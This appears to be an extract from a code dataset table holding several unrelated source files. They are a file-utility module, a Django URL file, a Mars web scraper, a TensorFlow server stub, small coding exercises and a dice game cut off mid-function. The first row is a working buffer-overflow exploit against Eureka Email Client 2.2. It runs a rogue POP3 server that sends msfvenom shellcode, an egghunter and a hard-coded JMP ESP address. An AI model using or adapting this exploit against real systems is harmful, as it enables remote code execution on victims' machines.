index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,600 | 7661c3a37345af511178a4f1352036e935e10242 | #Eureka Email Client 2.2 XP SP3 Exploit
import socket
host = '192.168.1.10'
port = 110
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(5)
except socket.error:
print 'Failed to create socket'
sys.exit()
print '[+] Listening for connections on port: {0}'.format(port)
# msf-egghunter -e suls -f python
egg = ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
egg += "\x05\x5a\x74\xef\xb8\x73\x75\x6c\x73\x89\xd7\xaf\x75"
egg += "\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -p windows/exec CMD=calc.exe -f python EXITFUNC=thread -b "\x00\xcc"
buf = ""
buf += "\xb8\x86\x91\xb8\x3d\xda\xc2\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x83\xc6\x04\x31\x46\x0f\x03\x46\x89\x73"
buf += "\x4d\xc1\x7d\xf1\xae\x3a\x7d\x96\x27\xdf\x4c\x96\x5c"
buf += "\xab\xfe\x26\x16\xf9\xf2\xcd\x7a\xea\x81\xa0\x52\x1d"
buf += "\x22\x0e\x85\x10\xb3\x23\xf5\x33\x37\x3e\x2a\x94\x06"
buf += "\xf1\x3f\xd5\x4f\xec\xb2\x87\x18\x7a\x60\x38\x2d\x36"
buf += "\xb9\xb3\x7d\xd6\xb9\x20\x35\xd9\xe8\xf6\x4e\x80\x2a"
buf += "\xf8\x83\xb8\x62\xe2\xc0\x85\x3d\x99\x32\x71\xbc\x4b"
buf += "\x0b\x7a\x13\xb2\xa4\x89\x6d\xf2\x02\x72\x18\x0a\x71"
buf += "\x0f\x1b\xc9\x08\xcb\xae\xca\xaa\x98\x09\x37\x4b\x4c"
buf += "\xcf\xbc\x47\x39\x9b\x9b\x4b\xbc\x48\x90\x77\x35\x6f"
buf += "\x77\xfe\x0d\x54\x53\x5b\xd5\xf5\xc2\x01\xb8\x0a\x14"
buf += "\xea\x65\xaf\x5e\x06\x71\xc2\x3c\x4c\x84\x50\x3b\x22"
buf += "\x86\x6a\x44\x12\xef\x5b\xcf\xfd\x68\x64\x1a\xba\x97"
buf += "\x86\x8f\xb6\x3f\x1f\x5a\x7b\x22\xa0\xb0\xbf\x5b\x23"
buf += "\x31\x3f\x98\x3b\x30\x3a\xe4\xfb\xa8\x36\x75\x6e\xcf"
buf += "\xe5\x76\xbb\xac\x68\xe5\x27\x1d\x0f\x8d\xc2\x61"
while True:
c, addr = s.accept()
print '[+] Client connected: {0}'.format(addr[0])
print '[+] Sending Evil payload: {0}'.format(addr[0])
evil = "sulssuls"
evil += buf
evil += "A" * (711 - 8 - len(buf))
evil += "\x6b\x8c\x49\x7e" #7 E498C6B JMP ESP user32.dll
evil += "\x90" * 10
evil += egg # Egghunter
evil += "C" * (5000 - 711 - 4 - 10 - len(egg) )
payload = "-ERR " + evil + "\r\n"
#print(payload)
c.send(payload)
print repr(addr[1]) + ": " + c.recv(1024)
c.close()
|
15,601 | 9aaa6a49b1e4814994df0feb1edb609735818d3b | # -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name:
# Purpose: This is to connect pygame to sxpNCPState
# Create Time: 2020/12/18 10:15
# Author: Xiaoping Sun xiaopingsun@gmail.com//971994252@qq.com
# Copyright: (c) t 2020
# Licence: <MIT licence>
# -------------------------------------------------------------------------------
#this file contains some classes that are to read text files
import codecs
import os,sys
import re
import pickle
import xlrd
import xlsxwriter
import joblib
import shutil
import json
# Module-level accumulators shared by the Traverse*/Count* helpers below.
dirstack = []
dirfile_list = []
total_len = 0
total_word = 0
import time
def coverbakcopythensave(fname, project_dict):
    """Rotate fname to fname.bak (replacing any previous .bak), then save project_dict as fname."""
    backup = fname + '.bak'
    if os.path.exists(fname):
        # drop the previous backup before renaming the current file onto it
        if os.path.exists(backup):
            os.remove(backup)
        os.rename(fname, backup)
    SaveObject(project_dict, fname)
def saveastimeversion(fname, dataobject):
    """Save dataobject under a timestamped variant of fname.

    Fix: SaveObject's signature is (ob, fname); the original call passed the
    filename as the object and the object as the filename, so the data was
    dumped into a file named after itself.
    """
    tfname = makebaktimefilename(fname)
    SaveObject(dataobject, tfname)
def replacewithnew(fname, fname_new, timebackdir):
    """Back up fname into timebackdir under a timestamped name, then replace it with fname_new."""
    _, leaf = os.path.split(fname)
    stamped = makebaktimefilename(leaf)
    shutil.copy(fname, os.path.join(timebackdir, stamped))
    os.remove(fname)
    shutil.copy(fname_new, fname)
def makebaktimefilename(fname):
    """Return fname + '--<timestamp>' chosen so it does not collide with an existing path."""
    candidate = fname + '--{0}'.format(time.time())
    while os.path.exists(candidate):
        candidate = fname + '--{0}'.format(time.time())
    return candidate
def makebaktimefilenamesuff(fname, suffix='.zip'):
    """Return a non-colliding fname + '<timestamp>' stem, with suffix appended.

    Note: only the stem (without suffix) is checked for existence, matching
    the original contract.
    """
    stem = fname + '{0}'.format(time.time())
    while os.path.exists(stem):
        stem = fname + '{0}'.format(time.time())
    return stem + suffix
def traversedir(input_path, result, file_pat='\.py$'):
    """Recursively append to result every path under input_path whose basename matches file_pat."""
    for entry in os.listdir(input_path):
        full = input_path + '/' + entry
        if os.path.isdir(full):
            traversedir(full, result, file_pat)
        elif matchpat(entry, file_pat):
            result.append(full)
def matchpat(filename, file_pat):
    """True when file_pat matches at the START of filename (re.match semantics)."""
    return re.match(file_pat, filename) is not None
def copydir(srcdir, trgdir):
    """Recursively copy srcdir to trgdir; return 'ok' on success, an error message otherwise."""
    try:
        shutil.copytree(srcdir, trgdir)
    except Exception as exc:
        return 'copytree dir failed' + srcdir + str(exc)
    return 'ok'
def deletedir(srcdir):
    """Recursively delete srcdir; return 'ok' on success, a printed error message otherwise."""
    try:
        shutil.rmtree(srcdir)
    except Exception as exc:
        msg = 'delete dir failed' + srcdir + str(exc)
        print(msg)
        return msg
    return 'ok'
def SaveObject(ob, fname):
    # Persist ob to fname with joblib at maximum compression (slowest, smallest).
    joblib.dump(ob, fname, compress=9)
def LoadObject(fname):
    # Load a joblib-dumped object; returns None (after a console note) when fname is missing.
    if os.path.exists(fname) == False:
        print('not exists', fname)
        return None
    return joblib.load(fname)
def extractname(fullname):
    """Decompose fullname into drive / directory / leaf parts plus the current cwd, as a dict."""
    drive, remainder = os.path.splitdrive(fullname)
    folder, leaf = os.path.split(fullname)
    return {
        'isdir': os.path.isdir(fullname),
        'drivename': drive,
        'remname': remainder,
        'currdir': os.getcwd(),
        'dirname': folder,
        'fname': leaf,
    }
def IsExsit(fname):
    # Thin wrapper over os.path.exists (misspelled name kept for existing callers).
    return os.path.exists(fname)
def CheckDir(dirstr):
    """Create directory dirstr if it does not exist; return dirstr.

    Fix: the original called os.path.os.mkdir, reaching os.mkdir only through
    the accidental `os` re-export inside os.path; call os.mkdir directly.
    """
    if not os.path.exists(dirstr):
        os.mkdir(dirstr)
        print('ok, we make dir', dirstr)
    print('ok', dirstr)
    return dirstr
def CheckDelMkDir(dirstr):
    """Ensure dirstr exists and is empty: create it if missing, otherwise delete and recreate it.

    Fix: the original returned immediately after shutil.rmtree succeeded, so an
    existing directory was deleted but never recreated (the mkdir below the
    try-block was unreachable). Returns dirstr on success, None if the delete
    fails.
    """
    if not os.path.exists(dirstr):
        os.mkdir(dirstr)
        print('ok, we make dir', dirstr)
    else:
        try:
            shutil.rmtree(dirstr)
        except Exception as e:
            msg = 'delete dir failed' + dirstr + str(e)
            print(msg)
            return None
        print('ok, we del origin one dir', dirstr)
        os.mkdir(dirstr)
        print('ok, we make dir', dirstr)
    print('ok', dirstr)
    return dirstr
def TestJsonDump():
    """Smoke-test JSON dumping: write 100 {i, j} records to test.json and a wrapping dict."""
    records = []
    for i in range(10):
        for j in range(10):
            records.append({'i': i, 'j': j})
    json_dict = {'test': records}
    with open('test.json', 'w+') as handle:
        json.dump(records, handle)
    StoreJsonDict(json_dict, 'json_dict.json')
def StoreJsonDict(json_dict, fname):
    """Serialize json_dict to fname as UTF-8 JSON; returns 1.

    Fix: the original ended with `f.close` (attribute access, no call), so the
    handle was never closed; a with-block guarantees closure and flushing.
    """
    with codecs.open(fname, 'w+', 'utf-8') as f:
        f.write(json.dumps(json_dict))
    return 1
def ExtractJsonFromStr(jstr):
    """Decode a JSON string and return the resulting Python object."""
    return json.loads(jstr)
def ReadJSonFromJSonFile(fname):
    """Read fname as UTF-8 JSON and return the decoded object.

    Fix: removed the leftover Python-2 `f = file(fname)` line, which raises
    NameError on Python 3 (and leaked a handle on Python 2); use a with-block.
    """
    with codecs.open(fname, 'r', 'utf-8') as f:
        return json.loads(f.read())
def ExtractJasonStr(jstr):
    """Strip a leading 'var data=' and a trailing '};' from a JS assignment, leaving bare JSON.

    Nested braces are fine because only the literal prefix and the '};' tail
    are rewritten, not the brace structure itself.
    """
    without_head = re.sub(r'var\sdata=', '', jstr)
    return re.sub(r'};', '}', without_head)
def DeepSave(fname, ob):
    # Same as SaveObject but with (fname, ob) argument order.
    joblib.dump(ob, fname, compress=9)
def CheckLoadDict(dirfile):
    # Load a joblib-pickled dict from dirfile, or return a fresh empty dict when missing.
    d = {}
    if os.path.exists(dirfile) == True:
        return joblib.load(dirfile)
    return d
def CheckLoadList(dirfile):
    # Load a joblib-pickled list from dirfile, or return a fresh empty list when missing.
    d = []
    if os.path.exists(dirfile) == True:
        return joblib.load(dirfile)
    return d
def StoreSxptext(sxptxt, fname):
    """Pickle sxptxt into fname (binary mode)."""
    with open(fname, 'wb') as handle:
        pickle.dump(sxptxt, handle)
def LoadSxptext(fname):
    """Unpickle and return the object stored in fname."""
    with open(fname, 'rb') as handle:
        return pickle.load(handle)
def IsType(fname, typename):
    """True when fname's final dot-separated suffix equals typename."""
    return fname.split('.')[-1] == typename
def GetDirFileList(filedir):
    """Return the names of plain files (not subdirectories) directly inside filedir.

    Prints a note and returns [] when filedir does not exist.
    """
    if not os.path.exists(filedir):
        print('no dir to be read')
        return []
    return [name for name in os.listdir(filedir)
            if not os.path.isdir(os.path.join(filedir, name))]
def WriteExcel(fname, tableindex, rwstrset):
    """Write rwstrset (list of tables -> rows -> cells) into fname via xlsxwriter.

    Every cell is written as its str() form, one worksheet per table.
    NOTE(review): the existence pre-check below rejects *new* files even though
    xlsxwriter would create the workbook -- looks copy-pasted from a reader
    function; confirm intent. `tableindex` is accepted but unused.
    """
    if not os.path.exists(fname):
        print('file does not exists', fname)
        return []
    try:
        workbook = xlsxwriter.Workbook(fname)
        nsheet = len(rwstrset)  # NOTE(review): computed but never used
        for eachtable in rwstrset:
            worksheet = workbook.add_worksheet()
            row = 0
            for eachrw in eachtable:
                col = 0
                for eachcol in eachrw:
                    # ctype 0 empty,1 string, 2 number, 3 date, 4 boolean, 5 error
                    ctype = 1
                    xf = 0
                    value = str(eachcol)
                    worksheet.write(row, col, value)
                    col = col + 1
                row = row + 1
            print('row write ', row)
        workbook.close()
    except Exception as e:
        print('error in writing excel', e)
def LoadExcel(fname, tableindex=0):
    """Open a workbook with xlrd and return sheet number tableindex (an xlrd sheet object).

    Returns [] (after a console note) when fname does not exist.
    """
    if not os.path.exists(fname):
        print('file does not exists', fname)
        return []
    data = xlrd.open_workbook(fname)
    table = data.sheets()[tableindex]
    nrows = table.nrows
    ncols = table.ncols
    print('load', fname, nrows, ncols)
    return table
def CountFileLineWord(filedir, ftype):
    """Print the total line and word counts of every *.ftype file under filedir (recursive)."""
    lines_total, words_total = TraverseCountDir(filedir, ftype)
    print('in ', filedir, ' you have: len, word are:')
    print(lines_total, words_total)
def GetDirFile(filedir, ftype):
    """Return lower-cased full paths of files directly in filedir whose extension equals ftype.

    Non-recursive. Returns (0, 0) when filedir is missing -- quirk kept from
    the original for caller compatibility.
    """
    if not os.path.exists(filedir):
        print(filedir)
        print('no dir to be read')
        return 0, 0
    matched = []
    for entry in os.listdir(filedir):
        full = os.path.join(filedir, entry)
        if os.path.isdir(full):
            continue
        if GetFileType(entry) == ftype:
            matched.append(full.lower())
    return matched
def CountFileNum(filedir, ftype):
    """Recursively count files under filedir.

    Returns (total files, files whose extension equals ftype, total byte size
    of those typed files). Returns (0, 0, 0) when filedir is missing.
    """
    if not os.path.exists(filedir):
        print(filedir)
        print('no dir to be read')
        return 0, 0, 0
    n_files = 0
    n_typed = 0
    size_typed = 0
    subdirs = []
    for entry in os.listdir(filedir):
        full = os.path.join(filedir, entry)
        if os.path.isdir(full):
            subdirs.append(full)
            continue
        n_files += 1
        if GetFileType(entry) == ftype:
            n_typed += 1
            # lower-cased path kept from the original (matters on case-sensitive filesystems)
            size_typed += os.path.getsize(full.lower())
    for sub in subdirs:
        sub_files, sub_typed, sub_size = CountFileNum(sub, ftype)
        n_files += sub_files
        n_typed += sub_typed
        size_typed += sub_size
    return n_files, n_typed, size_typed
def TraverseCountDir(filedir, ftype):
    """Recursively total (line count, word count) over files with extension ftype.

    Side effect: appends [fullpath, name] for every matched file to the
    module-level dirfile_list. Returns (0, 0) when filedir is missing.
    """
    if not os.path.exists(filedir):
        print(filedir)
        print('no dir to be read')
        return 0, 0
    # print 'visit--->:',filedir, os.path.getmtime(filedir)
    filelist = []
    subdirlist = []
    total_len = 0
    total_word = 0
    dirstack = []  # local; shadows the module-level dirstack, appended-to but never read
    files = os.listdir(filedir)
    #now we first read each file in the txtPath
    subfile_dic = {}  # unused
    for f in files:
        df = os.path.join(filedir, f)
        # print df, ' : ', os.path.isdir(df)
        if os.path.isdir(df):
            subdirlist.append(df)
            dirstack.append(df.lower())
        else:
            filelist.append(f)
    for eachf in filelist:
        ff = os.path.join(filedir, eachf).lower()
        urttype = GetFileType(eachf)
        if urttype == ftype:
            dirfile_list.append([ff, eachf])
            txtlines = ReadTxtLines(ff)
            lennum = len(txtlines)
            # word count: split each line on single spaces
            wordnum = 0
            for eachline in txtlines:
                wds = eachline.split(' ')
                wordnum = wordnum + len(wds)
            print(lennum, wordnum, ff)
            total_len = total_len + lennum
            total_word = total_word + wordnum
    # recurse depth-first into every subdirectory
    while len(subdirlist) > 0:
        next_subdir = subdirlist.pop()
        tl, tw = TraverseCountDir(next_subdir, ftype)
        total_len = total_len + tl
        total_word = total_word + tw
    return total_len, total_word
def GetFileType(fname):
    """Return fname's final dot-separated suffix (the whole name when it has no dot)."""
    return fname.rsplit('.', 1)[-1]
def GetURLFileType(urls):
    """Return the extension of a trailing 'name.ext' component of urls, or '' when absent."""
    tail = re.search(r'/{0,2}(\w+)(\.)(\w+)$', urls)
    if tail is None:
        return ''
    return tail.group(3)
def StoreSxptext(sxptxt, fname):
    # NOTE(review): duplicate of the StoreSxptext defined earlier in this module;
    # this later definition is the one in effect at runtime.
    f = open(fname, 'wb')
    pickle.dump(sxptxt, f)
    f.close()
def LoadSxptext(fname):
    # NOTE(review): duplicate of the LoadSxptext defined earlier in this module;
    # this later definition is the one in effect at runtime.
    f = open(fname, 'rb')
    sxptxt = pickle.load(f)
    f.close()
    return sxptxt
def cur_file_dir():
    """Directory of the running script.

    sys.path[0] is returned as-is when it is a directory (normal script run);
    its dirname when it is a file (e.g. a py2exe bundle); '.' otherwise.
    """
    base = sys.path[0]
    if os.path.isdir(base):
        return base
    if os.path.isfile(base):
        return os.path.dirname(base)
    return r'.'
# Project root: the original Windows path is immediately overridden with './'.
rootdir = r'D:\pythonwork\code\axureui'
rootdir = r'./' #cur_file_dir()
print(('rootdir:', rootdir))
# NOTE(review): these concatenate backslash-style relative paths onto rootdir;
# on non-Windows systems the results mix path separators -- confirm intended use.
logfilename = rootdir + r'\weblog\log.txt'
indexpage = rootdir + r'\templates\index.html'
startuipage = rootdir + r'\templates\start.htm'
webfileroot = rootdir + r'\webfile'
# Regex-escaped, lower-cased web-file root consumed by GetWebFilePathName below.
webfilerootpattern = webfileroot.replace('\\', '\\\\').lower()
def GetWebFilePathName(s):
    """Return the portion of path s that follows the web-file root, or None when it does not match.

    NOTE(review): the function returns inside the first loop iteration; when
    the pattern never matches, control reaches print('') and the function
    implicitly returns None -- callers (TraverseDir) rely on that None.
    """
    patstr = 'd:\\\\pythonwork\\\\code\\\\axureui\\\\webfile(.+)'  # immediately overridden below
    patstr = webfilerootpattern + '(.+)'
    pattern_pos = []
    pattern = re.compile(patstr)
    match = pattern.search(s)
    pat_name = 'url'
    filesuffixpatstr = r''  # unused
    while match:
        tg = match.groups()
        tgtxt = match.group()
        posd = match.span()
        match = pattern.search(s, posd[1])
        pattern_pos.append([tgtxt, posd, tg, pat_name, 1, 0])
        return tg[0]
    print('')
def TraverseDir(filedir):
    """Walk filedir recursively (via the module-level dirstack), registering web files.

    Side effects: appends to module globals dirstack / dirfile_list and writes
    url -> [path, type] entries into webfile_dic.
    NOTE(review): webfile_dic is never defined in this module -- this raises
    NameError unless some caller injects it; confirm where it is created.
    """
    if not os.path.exists(filedir):
        print('no dir to be read')
        return []
    # print 'visit--->:',filedir, os.path.getmtime(filedir)
    filelist = []
    subdirlist = []
    files = os.listdir(filedir)
    #now we first read each file in the txtPath
    for f in files:
        df = os.path.join(filedir, f)
        # print df, ' : ', os.path.isdir(df)
        if os.path.isdir(df):
            subdirlist.append(df)
            dirstack.append(df.lower())
        else:
            filelist.append(f)
    for eachf in filelist:
        if eachf == 'axQuery.std.js':
            breakpoint = 1  # leftover debugger hook
        ff = os.path.join(filedir, eachf).lower()
        urlpath = GetWebFilePathName(ff)
        if urlpath is None:
            print('none in', ff)
        else:
            urttype = GetURLFileType(eachf)
            webfile_dic[urlpath] = [ff, urttype]
            dirfile_list.append([ff, eachf, urlpath])
    # drain the shared dirstack; recursion repopulates it as it descends
    while len(dirstack) > 0:
        next_subdir = dirstack.pop()
        TraverseDir(next_subdir)
    return filelist, subdirlist
def GetDir(filedir):
    """Return (file names, subdirectory names) directly inside filedir.

    Returns [] (after a console note) when filedir does not exist.
    """
    if not os.path.exists(filedir):
        print('no dir to be read')
        return []
    names = os.listdir(filedir)
    subdirs = [n for n in names if os.path.isdir(os.path.join(filedir, n))]
    plain = [n for n in names if not os.path.isdir(os.path.join(filedir, n))]
    return plain, subdirs
def WriteStrFile(filename, txtstr, encodetype='gbk'):
    """Write txtstr to filename using encodetype (default gbk, matching legacy callers)."""
    with codecs.open(filename, 'w+', encodetype) as out:
        out.write(txtstr)
def ReadTextUTF(fname):
    """Read fname as UTF-8 text; returns [] (after a console note) on IOError.

    Fix: removed the unreachable trailing `return textcontent` (textcontent
    was never defined in this function) and close the handle via with.
    """
    try:
        with codecs.open(fname, 'r', 'utf-8') as f:
            return f.read()
    except IOError:
        print('wrong in open')
        return []
def ReadTextContent(fpathname):
    """Read the whole of fpathname as text; returns [] (after a console note) on IOError.

    Fix: removed the dead `return textcontent` after the except clause and
    replaced the manual open/close with a with-block.
    """
    try:
        with open(fpathname, 'r') as handle:
            return handle.read()
    except IOError:
        print('wrong in open')
        return []
def ReadALL(fpathname):
    """Read every line of fpathname (echoing each to stdout); [] on IOError.

    Fix: the original called file.close() inside the except handler, which
    raises NameError (masking the IOError) whenever open() itself failed;
    a with-block makes the cleanup safe. The dead `return lines` after the
    handler was removed.
    """
    print(fpathname)
    try:
        with open(fpathname, 'r') as handle:
            lineset = []
            for line in handle:
                print(line)
                lineset.append(line)
            return lineset
    except IOError:
        print('wrong in open')
        return []
def ReadTxtLines(fpathname):
    """Return the non-blank lines of fpathname (original newlines kept); [] on IOError.

    Fix: the original called file.close() inside the except handler (NameError
    when open() failed, masking the IOError) and ended with an unreachable
    `return lines` referencing an undefined name.
    """
    try:
        with open(fpathname, 'r') as handle:
            return [line for line in handle if line.strip()]
    except IOError:
        print('wrong in open')
        return []
def SaveTxtFile(fname, txt, encodetype='utf-8'):
    """Write txt to fname using encodetype; IOError is reported on stdout.

    Fix: the original ignored encodetype and always wrote UTF-8.
    """
    try:
        with codecs.open(fname, 'w', encodetype) as handle:
            handle.write(txt)
    except IOError as e:
        print(fname)
        print(('wrong in open', e))
def BackupTxtFile(fname):
    """Copy fname's text to fname.bk (or fname.bk.bk); after 2 collisions overwrite fname.bk."""
    txt = ReadTextUTF(fname)
    fnamename = fname + '.bk'
    i = 0
    while (1):
        if os.path.exists(fnamename):
            # candidate taken: extend with another '.bk' and retry
            fnamename = fnamename + '.bk'
            i = i + 1
            if i >= 2:
                # give up and overwrite the oldest backup
                fnamename = fname + '.bk'
                SaveTxtFile(fnamename, txt)
                print('overlap the oldest fil:', fnamename)
                break
        else:
            SaveTxtFile(fnamename, txt)
            print('backup it to file:', fnamename)
            break
def GetNewName(fname):
    """Return an unused name derived from fname: fname+'(1)', extended with '.bk' on collision.

    Gives up after 10 collisions and falls back to fname+'.bk'.
    """
    candidate = fname + '(1)'
    attempts = 0
    while True:
        if not os.path.exists(candidate):
            print('backup it to file:', candidate)
            return candidate
        candidate = candidate + '.bk'
        attempts = attempts + 1
        if attempts >= 10:
            candidate = fname + '.bk'
            print('overlap the oldest fil:', candidate)
            return candidate
def TestCount():
    """Count lines/words of source files and sizes of documents in hard-coded local dirs."""
    dirstack = []
    dirfile_list = []
    total_len = 0
    total_word = 0
    # NOTE(review): the four locals above shadow the module globals and are unused here
    filedir = r'E:\pythonworknew\code\textparse'
    print(filedir)
    print('--------------------- count source code')
    ftype = 'py'
    CountFileLineWord(filedir, ftype)
    ftype = 'html'
    CountFileLineWord(filedir, ftype)
    print('---------------------count document num')
    ftype = 'pdf'
    filedir = r'D:\pythonwork\code\queryparse'
    tf, specific_file_num, f_size = CountFileNum(filedir, ftype)
    print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
    ftype = 'pptx'
    filedir = r'D:\pythonwork\code\queryparse'
    tf, specific_file_num, f_size = CountFileNum(filedir, ftype)
    print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
    ftype = 'docx'
    filedir = r'D:\pythonwork\code\queryparse'
    tf, specific_file_num, f_size = CountFileNum(filedir, ftype)
    print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
    ftype = 'jpg'
    filedir = r'D:\pythonwork\code\queryparse'
    tf, specific_file_num, f_size = CountFileNum(filedir, ftype)
    print('There are %.3f' % (f_size/1024/1024), 'Mbytes', 'for all', specific_file_num, ' of type: ', ftype)
def testcopy():
    """Exercise copydir; the two src/trg pairs document its target-directory semantics."""
    src = r'.\src\test'
    trg = r'.\trg' #if using .\trg, the copydir will creat .\trg and copy all files and subdir
    # of the 'src\test' to the .\trg, if .trg is already there, error reports, cause it will first
    #create the target dir, so you do not have to create it
    src = r'.\src\test'
    trg = r'.\trg\test' #in this case, trg dir should be exists, and its sub dir
    #test should be not exist so that they can create it in the \trg dir becore copying
    #all files and sub dirs to the target dir.
    copydir(src, trg)
def testre():
    """Quick regex check ('.dpy' should NOT match the .py pattern), then wipe a scratch dir."""
    fn = r'E:\pythonworknew\code\emailman\testproject\sxpEmailMan.dpy'
    pt = '(.+)\.py$'
    g = re.match(pt, fn)
    if g:
        print(g.groups()[0])
    else:
        print('not matched')
    # NOTE(review): hard-coded non-raw Windows path -- confirm before running on another machine
    CheckDelMkDir('E:\pythonworknew\code\emailman\zip')
def main():
    """Manual test entry point; only the regex test is currently enabled."""
    # TestCount()
    # TestCount()
    # testcopy()
    testre()

if __name__ == '__main__':
    main()
|
15,602 | ef1baf7f1a103262c24a4b03f0327b46f9af5b29 | from django.urls import path
from products.models import Products
import csv
from . import views
# URL routes for this app: index view at the root plus a reset endpoint.
urlpatterns = [
    path('', views.index, name='index'),
    path('reset', views.reset, name='reset'),
]
def ready():
    """Reload the Products table from intern-test-data.csv and mark one item out of stock.

    Fixes: Products.objects.get_or_create returns (object, created); the
    original bound the created flag to `product` and discarded the object.
    The CSV handle is now closed via a with-block.
    NOTE(review): calling ready() at module import time wipes the Products
    table every time the URLconf loads -- confirm that side effect is intended.
    """
    Products.objects.all().delete()
    with open('intern-test-data.csv') as csvfile:
        dataReader = csv.reader(csvfile, delimiter=',', quotechar='"')
        next(dataReader)  # skip the header row
        for row in dataReader:
            product, _created = Products.objects.get_or_create(
                product_name=row[0],
                price=row[1],
                dimension=row[2],
                colours=row[3],
                material=row[4],
                image=row[5],
                seen=False,
                in_stock=True,
            )
    out = Products.objects.get(product_name="Sofa 2 dudukan Vienna")
    out.in_stock = False
    out.save()
ready()
def round_sum(a, b, c):
    """Sum of a, b and c after rounding each to the nearest multiple of 10 via round10."""
    return sum(round10(value) for value in (a, b, c))
def round10(x):
    """Round x to the nearest multiple of 10, halves rounding up.

    Fix: the original used `/`, which is float division on Python 3 and
    produced wrong results such as round10(15) == 25.0; use floor division.
    """
    if x % 10 >= 5:
        return (x // 10 + 1) * 10
    return (x // 10) * 10
15,604 | 28722b4c7334318dcdf0735050c6b4a67eda02c0 | from bs4 import BeautifulSoup as bs
import requests
from splinter import Browser
import time
import pandas as pd
def init_browser():
    """Launch a visible Chrome browser via splinter for scraping."""
    # @NOTE: Replace the path with your actual path to the chromedriver
    # NOTE(review): hard-coded per-machine driver path -- presumably meant to be configured
    executable_path = {"executable_path": "/Users/reena/Downloads/chromedriver"}
    return Browser("chrome", **executable_path, headless=False)
def scrape_info():
    """Scrape Mars news, the featured JPL image, a facts table and hemisphere
    images, returning them all in one dict."""
    browser = init_browser()
    # --- Latest news headline and teaser from mars.nasa.gov ---
    url = "https://mars.nasa.gov/news/"
    browser.visit(url)
    time.sleep(1)  # give the page time to render before grabbing html
    # Scrape page into Soup
    html = browser.html
    soup = bs(html, "html.parser")
    # Get news title and paragraph text
    news_title = soup.find('div', class_='content_title').get_text()
    news_p = soup.find('div', class_='article_teaser_body').get_text()
    print(news_title)
    print(news_p)
    # Get featured image url
    url = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
    browser.visit(url)
    time.sleep(1)
    html = browser.html
    soup = bs(html, 'html.parser')
    # the image URL lives inside the carousel article's inline style attribute
    image = soup.find('div', class_='carousel_items').find('article')['style']
    image_url = image.split("'")[1]
    url_base = "https://www.jpl.nasa.gov"
    featured_image_url = url_base + image_url
    print(featured_image_url)
    # Get mars facts (second HTML table on the page, as a list of records)
    url = "https://space-facts.com/mars/"
    tables = pd.read_html(url)
    df2 = tables[1]
    df2.columns = ["Parameter", "Values"]
    table = df2.to_dict('records')
    # Get mars hemispheres: collect detail-page links, then pull each full image
    url = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
    url_base = "https://astrogeology.usgs.gov"
    browser.visit(url)
    time.sleep(1)
    html = browser.html
    soup = bs(html, 'html.parser')
    result = soup.find_all('div', class_="item")
    url_list = []
    for y in result:
        link = y.find('a')['href']
        url_list.append(link)
    hemisphere_image_urls = []
    for x in url_list:
        url1 = url_base + x
        browser.visit(url1)
        html = browser.html
        soup = bs(html, 'html.parser')
        time.sleep(1)
        result1 = soup.find('img', class_="wide-image")
        image = url_base + result1["src"]
        result2 = soup.find('h2', class_='title')
        title = result2.text
        title = title.rsplit(' ', 1)[0]  # drop the last word of the page title
        mars_hemi = {"title": title, "img_url": image}
        hemisphere_image_urls.append(mars_hemi)
    print(hemisphere_image_urls)
    # Store data in a dictionary
    results = {
        "news_title": news_title,
        "news_p": news_p,
        "featured_image_url": featured_image_url,
        "table": table,
        "hemisphere_image_urls": hemisphere_image_urls
    }
    # Close the browser after scraping
    browser.quit()
    print(results)
    # Return results
    return results
# Allow running this scraper directly from the command line.
if __name__ == "__main__":
    scrape_info()
|
15,605 | de9b7aaf3b9d088f1048b63a4436c8c1f93c65c5 | import json
import tensorflow as tf

# Build the cluster description for this TensorFlow 1.x distributed job from JSON.
with open('clusterSpec.json') as f:
    clusterSpec = json.load(f)
cluster = tf.train.ClusterSpec(clusterSpec)
# Cap this process at 20% of GPU memory so several workers can share one card.
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)
sess_config = tf.ConfigProto(gpu_options=gpu_options)
# Start the server
server = tf.train.Server(cluster, config=sess_config)
# Block forever, serving the cluster.
server.join()
def check(s1, s2):
    """check if they are one edit or zero edit away"""
    if len(s1) == len(s2):
        return check_update(s1, s2)
    if len(s1) + 1 == len(s2):
        return check_insert(s1, s2)
    if len(s1) - 1 == len(s2):
        return check_insert(s2, s1)
    return False
def check_update(s1, s2):
    """Equal-length strings: True iff they differ in at most one position."""
    diffs = 0
    for pos in range(len(s1)):
        if s1[pos] != s2[pos]:
            diffs += 1
            if diffs > 1:
                return False
    return True
def check_insert(s1, s2):
    """True iff inserting exactly one character into s1 can yield s2 (len(s2) == len(s1)+1).

    Fix: the original allowed unlimited skips in s2, so inputs needing more
    than one insertion either returned True wrongly or ran index2 past the
    end of s2 (IndexError, e.g. ('ab', 'axy')). Only one skip is allowed.
    """
    index1 = 0
    index2 = 0
    skipped = False
    while index1 < len(s1):
        if s1[index1] != s2[index2]:
            if skipped:
                return False  # a second divergence means more than one edit
            skipped = True
            index2 += 1  # skip the inserted character in s2
        else:
            index1 += 1
            index2 += 1
    return True
# Smoke test: 'apple' vs 'aple' differ by one deletion, so this prints True.
print(check('apple', 'aple'))
|
15,607 | 3d1c8dbc6e775bcb00c9d87f9a4e32f62f268c0b | # -*- coding: utf-8 -*-
"""
2017-10-19 18:25:23
使用random库,制作掷骰子猜大小游戏。
@author: liqian
"""
import random as rd
def xiazhu():
    """Prompt for a bet; returns 'big' for 1, 'small' for 0, re-prompting on anything else.

    Fix: the original discarded the recursive retry's result (plain
    `xiazhu()`), so any invalid first entry made the function return None;
    propagate the retry value with `return`.
    """
    yourChoice = int(input("请下注(1代表大或0代表小)"))
    if yourChoice == 1:
        return "big"
    elif yourChoice == 0:
